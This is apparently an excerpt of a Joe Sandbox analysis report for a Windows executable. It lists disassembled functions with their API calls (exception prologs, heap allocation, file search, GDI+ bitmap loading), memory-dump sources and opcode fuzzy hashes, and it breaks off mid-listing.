                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 271e08ab283a3871d50f25893a1392429e074cbad7bda63f1247ad315bd8b450
                                                              • Instruction ID: 4566d98a5810687098b11931d7a52a202ab00a9d0a4c78dd29cfe091adbc06b8
                                                              • Opcode Fuzzy Hash: 271e08ab283a3871d50f25893a1392429e074cbad7bda63f1247ad315bd8b450
                                                              • Instruction Fuzzy Hash: DBC1C830A042549FEF15CF68C484BEA7BA5AF05314F0801BFDE459B3A6DB38A9C5CB65
                                                              Function 00413BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: b6b0162671b15d0fcf6e368d39912ce18c732cde97ba11a1f272586adf1460c7
                                                              • Instruction ID: 47a553370f61f9d316cd2e3c7d9b1d5486c6bf68c50e1213a806787fc70a9d29
                                                              • Opcode Fuzzy Hash: b6b0162671b15d0fcf6e368d39912ce18c732cde97ba11a1f272586adf1460c7
                                                              • Instruction Fuzzy Hash: FA71D271540B449EDB25DF70C851AE7B7E9AF14306F40092FE6AB83241EA3A66C8CF19
                                                              Function 00418284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00418289
                                                                • Part of subcall function 004113DC: __EH_prolog.LIBCMT ref: 004113E1
                                                                • Part of subcall function 0041A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0041A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$CloseFind
                                                              • String ID:
                                                              • API String ID: 2506663941-0
                                                              • Opcode ID: 3eba618578570e8d5ec7737e5a29d57486fa3509f3e103c50c9ff8775b641d4a
                                                              • Instruction ID: c453eb66958cd21cd4a428d84d4746891cde8563911ecb2b19bf79012fa932f0
                                                              • Opcode Fuzzy Hash: 3eba618578570e8d5ec7737e5a29d57486fa3509f3e103c50c9ff8775b641d4a
                                                              • Instruction Fuzzy Hash: 7B412B319442189ADB20DBA1CC51BEAB3B8AF00304F4400EFE54A93193EF796FC5CB14
                                                              Function 004113E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004113E1
                                                                • Part of subcall function 00415E37: __EH_prolog.LIBCMT ref: 00415E3C
                                                                • Part of subcall function 0041CE40: __EH_prolog.LIBCMT ref: 0041CE45
                                                                • Part of subcall function 0041B505: __EH_prolog.LIBCMT ref: 0041B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 2c4b9cac537fe856674e0f8796907fb6dc27828e745cee0aafc2a61085be703b
                                                              • Instruction ID: bb92f64d867c29facab0b43ea55b9089c7ce1e6689e61af721e479906e2a9046
                                                              • Opcode Fuzzy Hash: 2c4b9cac537fe856674e0f8796907fb6dc27828e745cee0aafc2a61085be703b
                                                              • Instruction Fuzzy Hash: F5414BB0905B409EE724CF7A8885AE6FBE5BF18304F90492FD5EE83282C7756654CB18
                                                              Function 004113DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004113E1
                                                                • Part of subcall function 00415E37: __EH_prolog.LIBCMT ref: 00415E3C
                                                                • Part of subcall function 0041CE40: __EH_prolog.LIBCMT ref: 0041CE45
                                                                • Part of subcall function 0041B505: __EH_prolog.LIBCMT ref: 0041B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 8dd20683b7b733e9557ed9be83d2cb1aec0ebe5dff59568cf014cc4affef3a83
                                                              • Instruction ID: 3c5e73c7e297bb15fafe8f64cdac25479b45135fee51678dc52d3fac2f587a26
                                                              • Opcode Fuzzy Hash: 8dd20683b7b733e9557ed9be83d2cb1aec0ebe5dff59568cf014cc4affef3a83
                                                              • Instruction Fuzzy Hash: EA4139B0905B409AE724DF7A8885AE6FBE5BF18304F90492FD5EE83282CB756654CB14
                                                              Function 0042B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0042B098
                                                                • Part of subcall function 004113DC: __EH_prolog.LIBCMT ref: 004113E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 307b0858129503666c83e0b653f6f2d9e53d1de27d77c818634dfcc4a2765894
                                                              • Instruction ID: 1eaa3894549be216c8ced1c54951ce42e1963fe1f901eb464d44253fa4e68211
                                                              • Opcode Fuzzy Hash: 307b0858129503666c83e0b653f6f2d9e53d1de27d77c818634dfcc4a2765894
                                                              • Instruction Fuzzy Hash: 0C318D71D002599EDF15DF66D851AFEBBB4AF08308F50449FE409B3252D739AE04CBA9
                                                              Function 0043AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,00443A34), ref: 0043ACF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: a418614e3212bdbd33401996d35ac65291ce02ebd3451e55b61b50343d6e1d58
                                                              • Instruction ID: 0b20d1409021647625e206d513d61a9e873cd0d602e1c52906960970f45e27e6
                                                              • Opcode Fuzzy Hash: a418614e3212bdbd33401996d35ac65291ce02ebd3451e55b61b50343d6e1d58
                                                              • Instruction Fuzzy Hash: DC117A376402255F9B218F19EC4085B7392ABC9330F166222FC95EB344D738DC1287CA
                                                              Function 0041CE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0041CE45
                                                                • Part of subcall function 00415E37: __EH_prolog.LIBCMT ref: 00415E3C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 64441dcd0320b683dbc885816a1d22d054a708e5e53de3331aa9c46780d22270
                                                              • Instruction ID: 8a2eb13eed5d25a64c4fe5038a8cf8c23b90361155581188e6eec3456660461d
                                                              • Opcode Fuzzy Hash: 64441dcd0320b683dbc885816a1d22d054a708e5e53de3331aa9c46780d22270
                                                              • Instruction Fuzzy Hash: 3211E3B1A41354DEEB10EB7AD9457EEBBE89F80304F10045FE446D3282DB789E44CB66
                                                              Function 00419215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 43e88f3d4b89050ca629107c669de580b0e85da8cd26cd9cececbbd88e2b957f
                                                              • Instruction ID: 0864f300223f0584debb91c273789f38b43ba44b871cc479acf16c33274e13db
                                                              • Opcode Fuzzy Hash: 43e88f3d4b89050ca629107c669de580b0e85da8cd26cd9cececbbd88e2b957f
                                                              • Instruction Fuzzy Hash: 2B018673D00528ABCF11AB69CD919DEB731AF88744B01455AF811B7212DA388D4186A8
                                                              Function 0043C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0043B136: RtlAllocateHeap.NTDLL(00000008,00443A34,00000000,?,0043989A,00000001,00000364,?,?,?,0041D984,?,?,?,00000004,0041D710), ref: 0043B177
                                                              • _free.LIBCMT ref: 0043C4E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction ID: 4910ca41c4df597a0da4c8742673b25664d91dabcbff6875c5ae348db2b3e109
                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction Fuzzy Hash: A0014E722003055BE331CF65D88196AFBECFB99370F25051EE184932C1EA34A805C778
                                                              Function 0043B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,00443A34,00000000,?,0043989A,00000001,00000364,?,?,?,0041D984,?,?,?,00000004,0041D710), ref: 0043B177
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 32b678ba357d218565ecde52cba86d4181c82c838c826f44963f9005f527319b
                                                              • Instruction ID: 2f34f393e84797e691ec2fba5f96e6763d3e8be4a163497772ec467930067f3b
                                                              • Opcode Fuzzy Hash: 32b678ba357d218565ecde52cba86d4181c82c838c826f44963f9005f527319b
                                                              • Instruction Fuzzy Hash: 8FF0B43250512467EF315A32AC15B9F7748EB497F0F18A227FD48E6290CB68DE0186EC
                                                              Function 00433C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00433C3F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 104dc79bb5313b9d968436f8fdbc84738009eddc818d194b9ed15291b74be14a
                                                              • Instruction ID: 025915743d7c06ba2ee43f349527d84390b120c600c4d8f348e7456a60badd44
                                                              • Opcode Fuzzy Hash: 104dc79bb5313b9d968436f8fdbc84738009eddc818d194b9ed15291b74be14a
                                                              • Instruction Fuzzy Hash: B2F0EC372002169FDF125F69EC0099B7799EF09B22B106136FA05E7290DB35DA20CB94
                                                              Function 00438E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 8b6bc2211ae9c4ec11964972153f7e099c2f2eba6717703de146da0c7aa76b9e
                                                              • Instruction ID: ae38997560b281ddc85112747880c5f9a48f1eace35a4a8a5207ef841455ad74
                                                              • Opcode Fuzzy Hash: 8b6bc2211ae9c4ec11964972153f7e099c2f2eba6717703de146da0c7aa76b9e
                                                              • Instruction Fuzzy Hash: 73E0E53220231557EA7136329C06B9FF6489B497B4F21212FBC58D7281CFACCD0181ED
                                                              Function 00415ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00415AC2
                                                                • Part of subcall function 0041B505: __EH_prolog.LIBCMT ref: 0041B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 37ca8cfa479620c40c1d3f6b1080aafda8c4a9801df291431676aca0479fd7f5
                                                              • Instruction ID: 13e29126a3d548cf150ab6c0dfd4fc000fd2bc2097ce2f51a9912ea2289560ba
                                                              • Opcode Fuzzy Hash: 37ca8cfa479620c40c1d3f6b1080aafda8c4a9801df291431676aca0479fd7f5
                                                              • Instruction Fuzzy Hash: 020181306106A0DAD715EBB9D0417DDFBE4DF54708F90848FA45653283CBB81B09D7AA
                                                              Function 0041A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6C4
                                                                • Part of subcall function 0041A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6F2
                                                                • Part of subcall function 0041A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6FE
                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0041A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: f68448ca1137dfb107b7c0da52cbc1508292b7d6dd80ca282a0239d30463136c
                                                              • Instruction ID: dcea5790c9afa39019d93778edae3a57312ac3d38aa4b2c6c314973620be16a5
                                                              • Opcode Fuzzy Hash: f68448ca1137dfb107b7c0da52cbc1508292b7d6dd80ca282a0239d30463136c
                                                              • Instruction Fuzzy Hash: FEF0E93100E380AACB2257B44900BC77BD45F16335F048A4FF1FD1219AC27910E49B27
                                                              Function 00420E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00420E3D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: 8bde7dede9e4decc9413afa392ce97d936759d00f12b156c5dd22a3eb2e0908b
                                                              • Instruction ID: 3af34965bb91c725d65f111094d99081b1575072161f283576000dbfbe349651
                                                              • Opcode Fuzzy Hash: 8bde7dede9e4decc9413afa392ce97d936759d00f12b156c5dd22a3eb2e0908b
                                                              • Instruction Fuzzy Hash: B5D0C2107010642ADA21332A39157FF29668FD671AF0E003BF14A576E3DE4C88C6A2AD
                                                              Function 0042A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 0042A62C
                                                                • Part of subcall function 0042A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0042A3DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction ID: 7bd7009f5d657021ba9bb7cda89bce62989bfe3793759df83c959f29119956e9
                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction Fuzzy Hash: 15D0A730300218B7DF01AB22EC02A7E7995EB00344F408027BC81C5141EBB5D920915B
                                                              Function 0042DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                              Download Yara Rule
                                                              APIs
